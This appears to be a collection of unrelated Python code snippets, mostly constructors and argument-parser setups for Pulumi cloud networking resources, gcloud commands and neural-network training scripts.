"def Args(cls, parser):\n cls.NETWORK_ARG = network_flags.NetworkArgumentForOtherResource(\n 'A reference to a network in this project',\n detailed_help=\"\"\"\\\n A reference to a network in this project to\n contain the VPN Gateway.\n \"\"\")\n cls.NETWORK_ARG.AddArgument(parser)\n cls.TARGET_VPN_GATEWAY_ARG = flags.TargetVpnGatewayArgument()\n cls.TARGET_VPN_GATEWAY_ARG.AddArgument(parser, operation_type='create')\n\n parser.add_argument(\n '--description',\n help='An optional, textual description for the target VPN Gateway.')",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n management_cluster: Optional[pulumi.Input[pulumi.InputType['PrivateCloudManagementClusterArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n network_config: Optional[pulumi.Input[pulumi.InputType['PrivateCloudNetworkConfigArgs']]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(__self__, *,\n managed_network_name: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_network_group_name: Optional[pulumi.Input[str]] = None,\n management_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n virtual_networks: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None):\n pulumi.set(__self__, \"managed_network_name\", managed_network_name)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if managed_network_group_name is not None:\n pulumi.set(__self__, \"managed_network_group_name\", managed_network_group_name)\n if management_groups is not None:\n pulumi.set(__self__, \"management_groups\", management_groups)\n if subnets is not None:\n pulumi.set(__self__, \"subnets\", subnets)\n if subscriptions is not None:\n pulumi.set(__self__, \"subscriptions\", subscriptions)\n if virtual_networks is not None:\n pulumi.set(__self__, \"virtual_networks\", virtual_networks)",
"def __init__(self, name: str, *args, size: int = 1024, network: 'base_network.Network' = None):\n self.name = name\n self._network = network if network is not None else defaults.network\n self._network.add_subnet(self)\n self._max_size = size\n self._ip_range = self._network.get_subnet_range(self._max_size)\n self._hosts = list(self._ip_range.hosts())\n\n self._nodes_dict = {}\n self.started = False\n self.loaded = False\n\n for node in utils.args.list_from_args(args):\n self.add_node(node)",
"def Args(parser):\n flags.AddRegion(parser)\n flags.AddCluster(parser)",
"def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Add common arguments\n self.add_argument(\n \"--debug\",\n action=\"store_true\",\n default=False,\n help=\"debug mode: show debug messages\",\n )\n self.add_argument(\n \"-s\",\n \"--server\",\n required=True,\n help='Galène server to connect to, e.g. \"wss://galene.example.com/ws\"',\n )\n self.add_argument(\n \"-g\",\n \"--group\",\n required=True,\n help=\"Join this group\",\n )\n self.add_argument(\n \"-u\",\n \"--username\",\n required=True,\n help=\"Group username\",\n )\n self.add_argument(\n \"-p\",\n \"--password\",\n help=\"Group password\",\n )",
"def _build_network(self):\n pass",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__, *,\n remote_address_space_prefixes: pulumi.Input[Sequence[pulumi.Input[str]]],\n remote_virtual_network_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n workspace_id: pulumi.Input[str],\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"remote_address_space_prefixes\", remote_address_space_prefixes)\n pulumi.set(__self__, \"remote_virtual_network_id\", remote_virtual_network_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"workspace_id\", workspace_id)\n if allow_forwarded_traffic is not None:\n pulumi.set(__self__, \"allow_forwarded_traffic\", allow_forwarded_traffic)\n if allow_gateway_transit is not None:\n pulumi.set(__self__, \"allow_gateway_transit\", allow_gateway_transit)\n if allow_virtual_network_access is not None:\n pulumi.set(__self__, \"allow_virtual_network_access\", allow_virtual_network_access)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if use_remote_gateways is not None:\n pulumi.set(__self__, \"use_remote_gateways\", use_remote_gateways)",
"def __init__(__self__,\n resource_name: str,\n args: LayerVersionPermissionArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def init_args(parser, custom_option=True):\n ### Weight initialization.\n agroup = parser.add_argument_group('Network initialization options')\n if custom_option:\n # This option becomes important if posthoc custom init is not that\n # trivial anymore (e.g., if networks use batchnorm). Then, the network\n # init must be customized for each such network.\n agroup.add_argument('--custom_network_init', action='store_true',\n help='Whether network parameters should be ' +\n 'initialized in a custom way. If this flag ' +\n 'is set, then Xavier initialization is ' +\n 'applied to weight tensors (zero ' +\n 'initialization for bias vectors). The ' +\n 'initialization of chunk and task ' +\n 'embeddings is independent of this option.')\n agroup.add_argument('--normal_init', action='store_true',\n help='Use weight initialization from a zero-mean ' +\n 'normal with std defined by the argument ' +\n '\\'std_normal_init\\'. Otherwise, Xavier ' +\n 'initialization is used. Biases are ' +\n 'initialized to zero.')\n agroup.add_argument('--std_normal_init', type=float, default=0.02,\n help='If normal initialization is used, this will ' +\n 'be the standard deviation used. Default: ' +\n '%(default)s.')\n agroup.add_argument('--std_normal_temb', type=float, default=1.,\n help='Std when initializing task embeddings. ' +\n 'Default: %(default)s.')\n agroup.add_argument('--std_normal_emb', type=float, default=1.,\n help='If a chunked hypernetwork is used (including ' +\n 'self-attention hypernet), then this will be ' +\n 'the std of their initialization. Default: ' +\n '%(default)s.')\n return agroup",
"def __init__(self):\n self.label = \"Neural network input files\"\n self.description = \"Use this tool to create the input ASCII files for the GeoXplore neural network. Before using this tool, the evidence must be combined into a unique conditions raster with the Combine tool and the band statistics must be obtained for all the evidence using the Band Collection Statistics tool. If desired fuzzy membership attribute can be added to each of the training sites. See the ArcMap Tools Options discussion in Usage Tips in the Help about adjusting default setting for this tool.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"",
"def Args(parser):\n flags.AddNetworkToParser(parser, positional=True)\n base.ASYNC_FLAG.AddToParser(parser)\n base.ASYNC_FLAG.SetDefault(parser, True)",
"def __init__(self, args):\n self.args = args\n\n self.batch_size = args.meta_batch_size\n self.test_batch_size = args.test_batch_size\n self.volume_size = args.volume_size\n self.n_class = args.n_class\n self.compactness_loss_weight = args.compactness_loss_weight\n self.smoothness_loss_weight = args.smoothness_loss_weight\n self.margin = args.margin\n\n self.forward = self.forward_unet\n self.construct_weights = self.construct_unet_weights\n self.seg_loss = _get_segmentation_cost\n self.get_compactness_cost = _get_compactness_cost",
"def __init__(self, resource, *args):\n self.args = list(args)\n self.flags = OrderedDict()\n self.additional_flags = []\n self._AddCommonFlags(resource)",
"def __init__(self, **kwargs):\n\n # Simply hold on to the parameters for now\n self.name = kwargs.get(\"name\", None)\n\n # Placeholder for the resulting layer\n self.layer = None",
"def __init__(__self__,\n resource_name: str,\n args: VirtualNetworkPeeringArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_network_uuid: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[Union[str, 'Region']]] = None,\n size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(self, strn, *windows):\n self.strn = strn\n self.windows = windows",
"def __init__(__self__,\n resource_name: str,\n args: NetworkFabricControllerArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n interception_port: Optional[pulumi.Input[int]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n mesh_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_network_group_name: Optional[pulumi.Input[str]] = None,\n managed_network_name: Optional[pulumi.Input[str]] = None,\n management_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n virtual_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n __props__=None):\n ...",
"def __init__(self, namespace, listOfArgumentNames):\n self.namespace = namespace\n self.listOfArgumentNames = listOfArgumentNames",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n destination_pool_name: Optional[pulumi.Input[str]] = None,\n ip: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def networks_argparse(parser):\n # First of all, we store action value\n subparsers = parser.add_subparsers(help='Action', dest='action')\n\n # All action value are listed here\n # - list: list all item in networks\n # - create: create a new network\n # - update: modify a existing network. All value are not mutable\n # - delete: destroy a network\n # - show: show detail of a specific network\n # - add: add a ip address\n # - remove: remove a ip address\n # - display: display all entries in a address\n # - include: include a entry in a address\n # - exclude: exclude a entry in a address\n subparsers.add_parser('list', help='list all networks')\n create = subparsers.add_parser('create', help='create new network')\n update = subparsers.add_parser('update', help='update network information')\n delete = subparsers.add_parser('delete', help='delete a network')\n show = subparsers.add_parser('show', help='show detail of a specific network')\n add = subparsers.add_parser('add', help='add a address on a network')\n remove = subparsers.add_parser('remove', help='remove a address on a network')\n display = subparsers.add_parser('display', help='display NS entries in a address')\n include = subparsers.add_parser('include', help='include a NS entry in a address')\n exclude = subparsers.add_parser('exclude', help='exclude a NS entry in a address')\n\n # To create a network, we need a network name, a network address and prefix,\n # and optionaly\n # - description: a description of the network\n # - gateway: the network gateway\n # - contact: a contact email for the network\n # - dns-master: the DNS master of reverse resolution\n # - dhcp: the DHCP server for the network\n # - vlan: the VLAN id\n create.add_argument('network', help='network name')\n create.add_argument('--address', help='network address', required=True)\n create.add_argument('--prefix', help='network prefix', required=True)\n create.add_argument('--description', help='a description of the network')\n create.add_argument('--gateway', help='the network gateway address')\n create.add_argument('--contact', help='a contact email for the network')\n create.add_argument('--dns-master', help='DNS master address for reverse DNS')\n create.add_argument('--dhcp', help='DHCP server address')\n create.add_argument('--radius', help='Radius server address')\n create.add_argument('--vlan', help='VLAN id')\n\n # To delete a network, we just need to know the name\n delete.add_argument('network', help='network name')\n\n # To update network information, we need the network name and the following value\n # are mutable\n # - description: a description of the network\n # - gateway: the network gateway\n # - contact: a contact email for the network\n # - dns-master: the DNS master of reverse resolution\n # - dhcp: the DHCP server for the network\n # - vlan: the VLAN id\n update.add_argument('network', help='network name')\n update.add_argument('--description', help='a description of the network')\n update.add_argument('--gateway', help='the network gateway address')\n update.add_argument('--contact', help='a contact email for the network')\n update.add_argument('--dns-master', help='DNS master address for reverse DNS')\n update.add_argument('--dhcp', help='DHCP server address')\n update.add_argument('--radius', help='Radius server address')\n update.add_argument('--vlan', help='VLAN id')\n\n # To have detail of a specific network, we just need the network name\n show.add_argument('network', help='network you want to show')\n\n # To add a new ip we need the 
network name and the following optionals value\n add.add_argument('network', help='network name')\n add.add_argument('--ip-address', help='IP address')\n add.add_argument('--default-name', help='Default DNS name')\n\n # To remove a ip address, we need to now the network and ip address\n remove.add_argument('network', help='network name')\n remove.add_argument('--ip-address', help='IP address', required=True)\n\n # To include a entry in ip address, we need network, address and a fqdn\n display.add_argument('network', help='network name')\n display.add_argument('address', help='address IP')\n\n # To include a entry in ip address, we need network, address and a fqdn\n include.add_argument('network', help='network name')\n include.add_argument('address', help='address IP')\n include.add_argument('fqdn', help='Full Qualified Domain Name')\n include.add_argument('--type', help='NS type')\n\n # To exclude a entry in ip address, we need network, address and a fqdn\n exclude.add_argument('network', help='network name')\n exclude.add_argument('address', help='address IP')\n exclude.add_argument('fqdn', help='Full Qualified Domain Name')\n exclude.add_argument('--type', help='NS type')",
"def __init__(self, *args):\n _snap.TCrossNet_swiginit(self, _snap.new_TCrossNet(*args))",
"def __init__(self, *args, **kwargs):\n layer_kwargs = lbann.Layer.__init__.__kwdefaults__.copy()\n op_kwargs = {}\n for key, value in kwargs.items():\n if key in layer_kwargs:\n layer_kwargs[key] = value\n else:\n op_kwargs[key] = value\n layer_kwargs['ops'] = [ operator_class(**op_kwargs) ]\n OperatorLayer.__init__(self, *args, **layer_kwargs)",
"def __init__(__self__,\n resource_name: str,\n args: Optional[TargetPoolArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def networkClassCreator(className,*args):\n\n print 'In networkClassCreator: ',args\n return WorldManipulationEvent(['create',className,args])",
"def __init__(__self__,\n resource_name: str,\n args: MeshArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: VirtualNetworkApplianceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def cl_args() -> argparse.Namespace:\n\n parser = argparse.ArgumentParser(\n description=\"Create graph from text file!\"\n )\n parser.add_argument(\n \"file_name\", help=\"Name of data in text file\", type=str\n )\n parser.add_argument(\"vertex_a\", help=\"start vertex\", type=str)\n parser.add_argument(\"vertex_b\", help=\"end vertex\", type=str)\n args = parser.parse_args()\n\n return args",
"def __init__(__self__, *,\n resource_group: pulumi.Input[str],\n access_tier: Optional[pulumi.Input[str]] = None,\n data_lake_enabled: Optional[pulumi.Input[bool]] = None,\n kind: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n network_rule: Optional[pulumi.Input['StorageAccountSpecNetworkRuleArgs']] = None,\n sku: Optional[pulumi.Input['StorageAccountSpecSkuArgs']] = None,\n supports_https_traffic_only: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"resource_group\", resource_group)\n if access_tier is not None:\n pulumi.set(__self__, \"access_tier\", access_tier)\n if data_lake_enabled is not None:\n pulumi.set(__self__, \"data_lake_enabled\", data_lake_enabled)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if network_rule is not None:\n pulumi.set(__self__, \"network_rule\", network_rule)\n if sku is not None:\n pulumi.set(__self__, \"sku\", sku)\n if supports_https_traffic_only is not None:\n pulumi.set(__self__, \"supports_https_traffic_only\", supports_https_traffic_only)",
"def __init__(__self__, *,\n address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n virtual_network_id: Optional[pulumi.Input[str]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None):\n if address_space_prefixes is not None:\n pulumi.set(__self__, \"address_space_prefixes\", address_space_prefixes)\n if allow_forwarded_traffic is not None:\n pulumi.set(__self__, \"allow_forwarded_traffic\", allow_forwarded_traffic)\n if allow_gateway_transit is not None:\n pulumi.set(__self__, \"allow_gateway_transit\", allow_gateway_transit)\n if allow_virtual_network_access is not None:\n pulumi.set(__self__, \"allow_virtual_network_access\", allow_virtual_network_access)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if remote_address_space_prefixes is not None:\n pulumi.set(__self__, \"remote_address_space_prefixes\", remote_address_space_prefixes)\n if remote_virtual_network_id is not None:\n pulumi.set(__self__, \"remote_virtual_network_id\", remote_virtual_network_id)\n if resource_group_name is not None:\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if use_remote_gateways is not None:\n pulumi.set(__self__, \"use_remote_gateways\", use_remote_gateways)\n if virtual_network_id is not None:\n pulumi.set(__self__, \"virtual_network_id\", virtual_network_id)\n if workspace_id is not None:\n pulumi.set(__self__, \"workspace_id\", workspace_id)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def get_arguments():\n parser = argparse.ArgumentParser(description=\"Luo Network\")\n parser.add_argument('-gpu', '--gpu', default=GPU, type=str,\n help='Supprot one GPU & multiple GPUs.')\n parser.add_argument(\"--dataset-name\", type=str, default=DATASET_NAME,\n help=\"The name of the dataset.\")\n parser.add_argument(\"--train-image-path\", type=str, default=TRAIN_IMAGE_PATH,\n help=\"Path to the directory containing the train image.\")\n parser.add_argument(\"--train-label-path\", type=str, default=TRAIN_LABEL_PATH,\n help=\"Path to the directory containing the train label.\")\n parser.add_argument(\"--val-image-path\", type=str, default=VAL_IMAGE_PATH,\n help=\"Path to the directory containing the validation image.\")\n parser.add_argument(\"--val-label-path\", type=str, default=VAL_LABEL_PATH,\n help=\"Path to the directory containing the validation label.\")\n\n parser.add_argument(\"--test-image-path\", type=str, default=TEST_IMAGE_PATH,\n help=\"Path to the directory containing the validation image.\")\n parser.add_argument(\"--test-label-path\", type=str, default=TEST_LABEL_PATH,\n help=\"Path to the directory containing the validation label.\")\n\n parser.add_argument(\"--in-size\", type=int, default=IN_SIZE,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--out-size\", type=int, default=OUT_SIZE,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--pad\", type=int, default=PAD,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--image-num\", type=int, default=IMAGE_NUM,\n help=\"The number of the input images.\")\n parser.add_argument(\"--nor\", type=int, default=NOR,\n help=\"nor.\")\n parser.add_argument(\"--batch-size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--in-channels\", type=int, default=IN_CHANNELS,\n help=\"\")\n parser.add_argument(\"--out-channels\", type=int, default=OUT_CHANNELS,\n help=\"\")\n parser.add_argument(\"--branch\", type=int, default=BRANCH,\n help=\"\")\n parser.add_argument(\"--worker-num\", type=int, default=WORKER_NUM,\n help=\"\")\n parser.add_argument(\"--num-filters\", type=int, default=NUM_FILTERS,\n help=\"\")\n parser.add_argument(\"--useallgpu\", type=str, default=USEALLGPU,\n help=\".\")\n parser.add_argument(\"--gpu-device\", type=str, default=GPU_DEVICE,\n help=\".\")\n parser.add_argument(\"--class-num\", type=int, default=CLASS_NUM,\n help=\"Path to the file listing the images in the target dataset.\")\n\n parser.add_argument(\"--learning-rate\", type=float, default=LEARNING_RATE,\n help=\"Base learning rate for training with polynomial decay.\")\n parser.add_argument(\"--start-epoch\", type=int, default=START_EPOCH,\n help=\"The start epoch.\")\n parser.add_argument(\"--end-epoch\", type=int, default=END_EPOCH,\n help=\"The end epoch.\")\n parser.add_argument(\"--snapshot-epoch\", type=int, default=SNAPSHOT_EPOCH,\n help=\"Save summaries and checkpoint every often.\")\n parser.add_argument(\"--val-epoch\", type=int, default=SNAPSHOT_EPOCH,\n help=\"Validation summaries and checkpoint every often..\")\n parser.add_argument(\"--decay-rate\", type=float, default=DECAY_RATE,\n help=\"Regularisation parameter for L2-loss.\")\n parser.add_argument(\"--decay-step\", type=int, default=DECAY_STEP,\n help=\"The step of regularisation parameter for L2-loss.\")\n parser.add_argument(\"--epoch-model-save-prefix\", type=str, default=EPOCH_MODEL_SAVE_PREFIX,\n help=\"The prefix name of model save by 
epoch.\")\n parser.add_argument(\"--itera-model-save-prefix\", type=str, default=ITERA_MODEL_SAVE_PREFIX,\n help=\"The prefix name of model save by iteration.\")\n parser.add_argument(\"--val-seg-csv-path\", type=str, default=VAL_SEG_CSV_PATH,\n help=\"Where to save the validation csv file.\")\n parser.add_argument(\"--save-dir-path\", type=str, default=SAVE_DIR_PATH,\n help=\"Where to save the file.\")\n parser.add_argument(\"--test-seg-csv-path\", type=str, default=TEST_SEG_CSV_PATH,\n help=\"Where to save the HARD validation csv file.\")\n parser.add_argument(\"--model-save-path\", type=str, default=MODEL_SAVE_PATH,\n help=\"Where to save the model.\")\n parser.add_argument(\"--image-save-path\", type=str, default=IMAGE_SAVE_PATH,\n help=\"Where to save the image.\")\n\n return parser.parse_args()",
"def __init__(__self__, *,\n location: pulumi.Input[str],\n management_cluster: pulumi.Input['PrivateCloudManagementClusterArgs'],\n network_config: pulumi.Input['PrivateCloudNetworkConfigArgs'],\n description: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"management_cluster\", management_cluster)\n pulumi.set(__self__, \"network_config\", network_config)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)",
"def mk_rg3(self):\n pass",
"def __init__(self, *args):\n this = _libsbml.new_L3ParserSettings(*args)\n try: self.this.append(this)\n except: self.this = this",
"def __init__(self, hparams):\n super(ThreeLayerClassifier, self).__init__()\n self.hparams = hparams\n self.layer_1 = torch.nn.Linear(self.hparams[\"input_size\"], 128)\n self.layer_2 = torch.nn.Linear(128, 256)\n self.layer_3 = torch.nn.Linear(256, self.hparams[\"targets\"])",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl_id: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n dest_cidr: Optional[pulumi.Input[str]] = None,\n dest_port_range: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ip_protocol: Optional[pulumi.Input[str]] = None,\n policy: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n source_cidr: Optional[pulumi.Input[str]] = None,\n source_port_range: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, args, normalization_mean, normalization_std,\n style_img, content_img, content_weight=1, style_weight=1000000):\n super(ArtNet, self).__init__()\n\n self.args = args\n\n self.style_img = style_img\n self.content_img = content_img\n\n self.content_layers = ['conv_4']\n self.style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n # mean and std used for normalization\n self.normalization_mean = normalization_mean\n self.normalization_std = normalization_std\n\n # weights of content image and style image\n self.content_weight = args.content_weight if args else content_weight\n self.style_weight = args.style_weight if args else style_weight\n\n # initialize vgg19 pre-trained model\n self.model = vgg19(pretrained=True).features.to(device).eval()",
"def __init__(self, optimization_options, network, *args, **kwargs):\n\n self._params = Parameters()\n for path, param in network.get_variables().items():\n self._params.add(path + '_gradient',\n numpy.zeros_like(param.get_value()))\n self._params.add(path + '_sum_sqr_gradient',\n numpy.zeros_like(param.get_value()))\n\n super().__init__(optimization_options, network, *args, **kwargs)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n action: Optional[pulumi.Input[str]] = None,\n layer_name: Optional[pulumi.Input[str]] = None,\n organization_id: Optional[pulumi.Input[str]] = None,\n principal: Optional[pulumi.Input[str]] = None,\n statement_id: Optional[pulumi.Input[str]] = None,\n version_number: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...",
"def __init__(__self__, *,\n address_space: pulumi.Input[str],\n location: pulumi.Input[str],\n resource_group: pulumi.Input[str],\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]] = None):\n pulumi.set(__self__, \"address_space\", address_space)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"resource_group\", resource_group)\n if subnets is not None:\n pulumi.set(__self__, \"subnets\", subnets)",
"def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ethertype: Optional[pulumi.Input[str]] = None,\n port_range_max: Optional[pulumi.Input[int]] = None,\n port_range_min: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n remote_group_id: Optional[pulumi.Input[str]] = None,\n remote_ip_prefix: Optional[pulumi.Input[str]] = None,\n security_group_id: Optional[pulumi.Input[str]] = None,\n tenant_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, functions=None, variables=None, global_resource=None):\n self.ssa = NetworkEnsemble()\n if functions is None:\n self.ssa.functions = dict()\n else:\n self.ssa.functions = functions\n if variables is None:\n self.ssa.variables = dict()\n else:\n self.ssa.variables = variables\n if global_resource is None:\n self.ssa.global_resource = dict()\n else:\n self.ssa.global_resource = global_resource",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'L3Network':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = L3NetworkArgs.__new__(L3NetworkArgs)\n\n __props__.__dict__[\"associated_resource_ids\"] = None\n __props__.__dict__[\"cluster_id\"] = None\n __props__.__dict__[\"detailed_status\"] = None\n __props__.__dict__[\"detailed_status_message\"] = None\n __props__.__dict__[\"extended_location\"] = None\n __props__.__dict__[\"hybrid_aks_clusters_associated_ids\"] = None\n __props__.__dict__[\"hybrid_aks_ipam_enabled\"] = None\n __props__.__dict__[\"hybrid_aks_plugin_type\"] = None\n __props__.__dict__[\"interface_name\"] = None\n __props__.__dict__[\"ip_allocation_type\"] = None\n __props__.__dict__[\"ipv4_connected_prefix\"] = None\n __props__.__dict__[\"ipv6_connected_prefix\"] = None\n __props__.__dict__[\"l3_isolation_domain_id\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_machines_associated_ids\"] = None\n __props__.__dict__[\"vlan\"] = None\n return L3Network(resource_name, opts=opts, __props__=__props__)",
"def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n annotation: Optional[pulumi.Input[str]] = None,\n infrastructure_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ExpressRouteConnectionInformationArgs']]]]] = None,\n ipv4_address_space: Optional[pulumi.Input[str]] = None,\n ipv6_address_space: Optional[pulumi.Input[str]] = None,\n is_workload_management_network_enabled: Optional[pulumi.Input[Union[str, 'IsWorkloadManagementNetworkEnabled']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_resource_group_configuration: Optional[pulumi.Input[pulumi.InputType['ManagedResourceGroupConfigurationArgs']]] = None,\n network_fabric_controller_name: Optional[pulumi.Input[str]] = None,\n nfc_sku: Optional[pulumi.Input[Union[str, 'NfcSku']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n workload_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ExpressRouteConnectionInformationArgs']]]]] = None,\n __props__=None):\n ...",
"def __init__(self, *args: Union[List[AtomKey], EKT], **kwargs: str) -> None:\n ...",
"def __init__(self, *args: Union[List[AtomKey], DKT], **kwargs: str) -> None:\n ...",
"def __init__(self, *args: Union[List[AtomKey], HKT], **kwargs: str) -> None:\n ...",
"def __init__(self, args):\n self.totalArgs = len(args)\n self.marathonURL = args[1]\n self.appid = args[2]\n self.totalports = args[3]",
